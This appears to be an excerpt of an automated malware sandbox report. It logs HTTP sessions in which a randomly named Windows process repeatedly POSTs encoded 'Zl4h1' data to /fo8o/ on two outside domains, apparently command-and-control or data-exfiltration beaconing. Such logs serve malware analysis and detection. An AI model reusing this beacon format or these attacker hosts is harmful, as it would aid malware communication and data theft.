                                                    Jun 9, 2024 18:02:14.755176067 CEST  117  IN  Data Raw: 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 61 67 65 2e 75 63 2e 63 6e 2f 73 2f 75 61 65 2f 67 2f 33 6f 2f 62 65 72 67 2f 73 74 61 74 69 63 2f 61 72 63 68 65 72 5f 69 6e 64 65 78 2e 65 39 36 64 63 36 64 63 36 38 36 33 38
                                                    Data Ascii: <script src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js"></script></body></html>


                                                    Session ID: 37  Source IP: 192.168.2.11  Source Port: 49749  Destination IP: 217.196.55.202  Destination Port: 80  PID: 6576  Process: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp  Bytes transferred  Direction  Data
                                                    Jun 9, 2024 18:02:19.842185020 CEST  785  OUT  POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.empowermedeco.com
                                                    Origin: http://www.empowermedeco.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 202
                                                    Referer: http://www.empowermedeco.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 76 39 31 72 6c 4f 32 6e 39 6f 4c 61 47 32 41 39 46 7a 47 48 47 79 56 53 31 58 6a 33 52 2b 57 52 6b 41 3d 3d
                                                    Data Ascii: Zl4h1=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0Jv91rlO2n9oLaG2A9FzGHGyVS1Xj3R+WRkA==
                                                    Jun 9, 2024 18:02:20.479007006 CEST  1070  IN  HTTP/1.1 301 Moved Permanently
                                                    Connection: close
                                                    content-type: text/html
                                                    content-length: 795
                                                    date: Sun, 09 Jun 2024 16:02:20 GMT
                                                    server: LiteSpeed
                                                    location: https://www.empowermedeco.com/fo8o/
                                                    platform: hostinger
                                                    content-security-policy: upgrade-insecure-requests
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                    Session ID: 38  Source IP: 192.168.2.11  Source Port: 49750  Destination IP: 217.196.55.202  Destination Port: 80  PID: 6576  Process: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp  Bytes transferred  Direction  Data
                                                    Jun 9, 2024 18:02:22.376936913 CEST  805  OUT  POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.empowermedeco.com
                                                    Origin: http://www.empowermedeco.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 222
                                                    Referer: http://www.empowermedeco.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 64 51 68 78 43 48 59 50 7a 59 2f 4a 32 6a 6d 44 44 53 6d 41 76 31 4b 2f 52 54 4a 57 65 6b 6a 6b 6f 3d
                                                    Data Ascii: Zl4h1=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhdQhxCHYPzY/J2jmDDSmAv1K/RTJWekjko=
                                                    Jun 9, 2024 18:02:23.022701025 CEST  1070  IN  HTTP/1.1 301 Moved Permanently
                                                    Connection: close
                                                    content-type: text/html
                                                    content-length: 795
                                                    date: Sun, 09 Jun 2024 16:02:22 GMT
                                                    server: LiteSpeed
                                                    location: https://www.empowermedeco.com/fo8o/
                                                    platform: hostinger
                                                    content-security-policy: upgrade-insecure-requests
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                    Session ID: 39  Source IP: 192.168.2.11  Source Port: 49751  Destination IP: 217.196.55.202  Destination Port: 80  PID: 6576  Process: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp  Bytes transferred  Direction  Data
                                                    Jun 9, 2024 18:02:24.913691044 CEST  1818  OUT  POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.empowermedeco.com
                                                    Origin: http://www.empowermedeco.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1234
                                                    Referer: http://www.empowermedeco.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 54 6b 50 42 6f 68 4a 79 66 57 62 33 4e 6e 38 58 44 6c 46 66 7a 61 2f 49 66 64 6e 42 33 6d 7a 51 37 57 4b 65 6f 72 65 55 75 34 78 30 73 63 6b 71 41 54 48 37 53 44 6c 42 70 58 2b 39 48 73 46 75 43 6e 4a 53 48 68 41 67 54 68 49 79 76 52 2b 42 47 43 61 64 30 75 4c 6f 70 32 6c 41 6f 34 6d 4f 65 5a 6a 43 72 67 79 71 76 4c 71 5a 7a 4f 31 4f 5a 6e 37 68 75 35 4b 34 66 33 2f 45 38 33 6d 73 46 76 45 61 79 51 6b 63 48 4c 39 78 42 44 7a 54 6a 52 77 43 4a 62 76 47 36 55 67 47 4c 4c 38 30 33 65 [TRUNCATED]
                                                    Data Ascii: Zl4h1= [TRUNCATED]
                                                    Jun 9, 2024 18:02:25.558496952 CEST  1070  IN  HTTP/1.1 301 Moved Permanently
                                                    Connection: close
                                                    content-type: text/html
                                                    content-length: 795
                                                    date: Sun, 09 Jun 2024 16:02:25 GMT
                                                    server: LiteSpeed
                                                    location: https://www.empowermedeco.com/fo8o/
                                                    platform: hostinger
                                                    content-security-policy: upgrade-insecure-requests
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                     Session ID: 40 | Source IP: 192.168.2.11 | Source Port: 49752 | Destination IP: 217.196.55.202 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     Jun 9, 2024 18:02:27.441648006 CEST | 509 | OUT | GET /fo8o/?Zl4h1=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgd1+5vEXfQMT7HDcUO7Jh3BJK53kSorIMs=&Pbw=PLVXbnG85 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Host: www.empowermedeco.com
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                     Jun 9, 2024 18:02:28.083786011 CEST | 1211 | IN | HTTP/1.1 301 Moved Permanently
                                                    Connection: close
                                                    content-type: text/html
                                                    content-length: 795
                                                    date: Sun, 09 Jun 2024 16:02:28 GMT
                                                    server: LiteSpeed
                                                    location: https://www.empowermedeco.com/fo8o/?Zl4h1=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgd1+5vEXfQMT7HDcUO7Jh3BJK53kSorIMs=&Pbw=PLVXbnG85
                                                    platform: hostinger
                                                    content-security-policy: upgrade-insecure-requests
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                     Session ID: 41 | Source IP: 192.168.2.11 | Source Port: 49753 | Destination IP: 104.206.198.212 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     Jun 9, 2024 18:02:49.584657907 CEST | 779 | OUT | POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.shenzhoucui.com
                                                    Origin: http://www.shenzhoucui.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 202
                                                    Referer: http://www.shenzhoucui.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 50 49 6e 49 63 4d 6d 76 50 55 67 68 68 69 71 34 65 61 6e 35 72 38 69 50 4f 69 59 69 56 6a 57 66 48 35 65 4a 33 34 41 58 45 59 46 38 6b 77 6f 54 79 2f 46 79 36 4f 61 57 49 75 4f 34 37 53 69 35 51 52 76 4b 74 55 7a 49 73 37 78 39 72 4d 52 4b 61 52 64 46 54 45 45 4d 50 58 31 51 43 51 64 4e 6e 39 69 2b 64 65 30 6c 44 74 45 4d 42 64 54 2b 39 65 56 71 4d 61 4b 71 35 47 72 43 6a 6d 63 43 39 61 4d 68 68 35 6b 56 70 79 4d 52 33 36 4f 61 66 52 54 56 79 53 6d 63 2f 49 74 36 70 6e 78 51 35 7a 62 44 6b 4a 45 69 6f 64 63 4c 72 35 7a 73 79 4d 4d 63 6f 49 4b 32 4d 5a 44 63 36 64 63 53 6f 77 3d 3d
                                                    Data Ascii: Zl4h1=PInIcMmvPUghhiq4ean5r8iPOiYiVjWfH5eJ34AXEYF8kwoTy/Fy6OaWIuO47Si5QRvKtUzIs7x9rMRKaRdFTEEMPX1QCQdNn9i+de0lDtEMBdT+9eVqMaKq5GrCjmcC9aMhh5kVpyMR36OafRTVySmc/It6pnxQ5zbDkJEiodcLr5zsyMMcoIK2MZDc6dcSow==
                                                     Jun 9, 2024 18:02:50.331880093 CEST | 1037 | IN | HTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sun, 09 Jun 2024 16:02:51 GMT
                                                    Content-Type: text/html;charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    X-Powered-By: PHP/5.4.41
                                                    Content-Encoding: gzip
                                                    Data Raw: 33 31 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 4d 6f dc 36 10 bd fb 57 4c 74 d9 5d a0 2b 6a 5d 27 4e b4 5a 1d 1c 3b 48 00 d7 35 e2 0d 90 a0 28 0a 8a 9a 5d d1 91 48 86 a4 d6 5e 27 01 72 29 72 e8 a1 e8 a1 01 82 a4 a7 a2 40 8f 69 4f 05 0a f7 d7 74 dd f6 5f 74 24 6d d1 4d 3f 0e a2 44 72 de e3 cc e3 1b 25 d7 f6 3f be 3d 7d 74 7c 00 77 a7 1f 1d c2 f1 83 bd c3 7b b7 21 18 32 76 ef 60 7a 87 b1 fd e9 7e b7 b3 1d 46 8c 1d 1c 05 e9 56 52 f8 aa 6c 5e c8 f3 34 f1 d2 97 98 fe f1 f2 ab ab 1f 5f af be ff 81 1b f3 eb 4f 5f fc 7e 79 79 eb fa 6e 34 bc 7a fb e2 ea d5 bb d5 db 77 ab 6f 5e 3c fb ed f5 cf ab cb af 57 9f 7f b7 fa f2 db 84 75 b8 ad c4 09 2b 8d 07 67 c5 24 60 a7 4f 6a b4 cb b0 92 2a 3c 75 01 a4 09 eb b6 e9 a3 3d 6d 2b c9 74 be 84 6c 2e 74 a9 ed 24 38 2b a4 c7 36 a5 51 ba 13 7d 08 77 b4 cd 64 9e a3 a2 f8 11 2d 9b f4 91 ae 21 d7 aa e7 a1 e0 0b 04 83 b6 92 ce 49 ad c0 6b e0 42 a0 73 e0 0b 84 07 f7 0f a1 59 2c a4 03 87 76 81 36 84 13 6d ed 12 66 da b6 11 52 09 ad 16 a8 24 2a 81 61 92 59 96 6e 1d 97 c8 1d 82 [TRUNCATED]
                                                    Data Ascii: 31buTMo6WLt]+j]'NZ;H5(]H^'r)r@iOt_t$mM?Dr%?=}t|w{!2v`z~FVRl^4_O_~yyn4zwo^<Wu+g$`Oj*<u=m+tl.t$8+6Q}wd-!IkBsY,v6mfR$*aYnE19Wy)[L>jNDYqNvkicXRtZf3IFLl=g]:d#XU0;h{8ZyTyJKs\aBt#nc8,q<'9QdrbWi8#{EkQP*<<e%03|c*n6HF%kJ4<]pLAHQc&5CHnqoIXp2^q<LHClREM6*R*]A??m/33.6%x+;hp89RQ{=~f>7Ano_0


                                                     Session ID: 42 | Source IP: 192.168.2.11 | Source Port: 49754 | Destination IP: 104.206.198.212 | Destination Port: 80 | PID: 6576 | Process: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     Jun 9, 2024 18:02:52.114195108 CEST | 799 | OUT | POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.shenzhoucui.com
                                                    Origin: http://www.shenzhoucui.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 222
                                                    Referer: http://www.shenzhoucui.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 50 49 6e 49 63 4d 6d 76 50 55 67 68 67 48 69 34 62 39 4c 35 67 38 69 4d 58 69 59 69 62 44 58 33 48 35 61 4a 33 36 74 4b 48 71 68 38 6b 55 67 54 78 37 5a 79 35 4f 61 57 43 4f 4f 78 6d 69 69 45 51 52 69 39 74 52 4c 49 73 2f 68 39 72 4e 4e 4b 61 6d 70 45 51 30 45 4f 41 33 31 65 4d 77 64 4e 6e 39 69 2b 64 66 52 2b 44 74 73 4d 41 70 76 2b 39 37 68 72 46 36 4b 70 2b 47 72 43 6e 6d 63 47 39 61 4d 54 68 38 4d 72 70 33 41 52 33 2f 71 61 65 46 48 61 6e 43 6d 47 37 49 73 6c 76 48 6b 58 36 41 4b 4d 67 61 67 64 75 2b 52 72 6a 66 69 32 69 76 46 4c 72 62 43 30 59 2f 69 73 7a 73 35 62 7a 36 57 36 39 48 4a 4a 2f 32 37 68 68 67 70 66 55 4b 6c 50 32 74 63 3d
                                                    Data Ascii: Zl4h1=PInIcMmvPUghgHi4b9L5g8iMXiYibDX3H5aJ36tKHqh8kUgTx7Zy5OaWCOOxmiiEQRi9tRLIs/h9rNNKampEQ0EOA31eMwdNn9i+dfR+DtsMApv+97hrF6Kp+GrCnmcG9aMTh8Mrp3AR3/qaeFHanCmG7IslvHkX6AKMgagdu+Rrjfi2ivFLrbC0Y/iszs5bz6W69HJJ/27hhgpfUKlP2tc=
                                                     Jun 9, 2024 18:02:52.845716953 CEST | 1037 | IN | HTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sun, 09 Jun 2024 16:02:54 GMT
                                                    Content-Type: text/html;charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    X-Powered-By: PHP/5.4.41
                                                    Content-Encoding: gzip
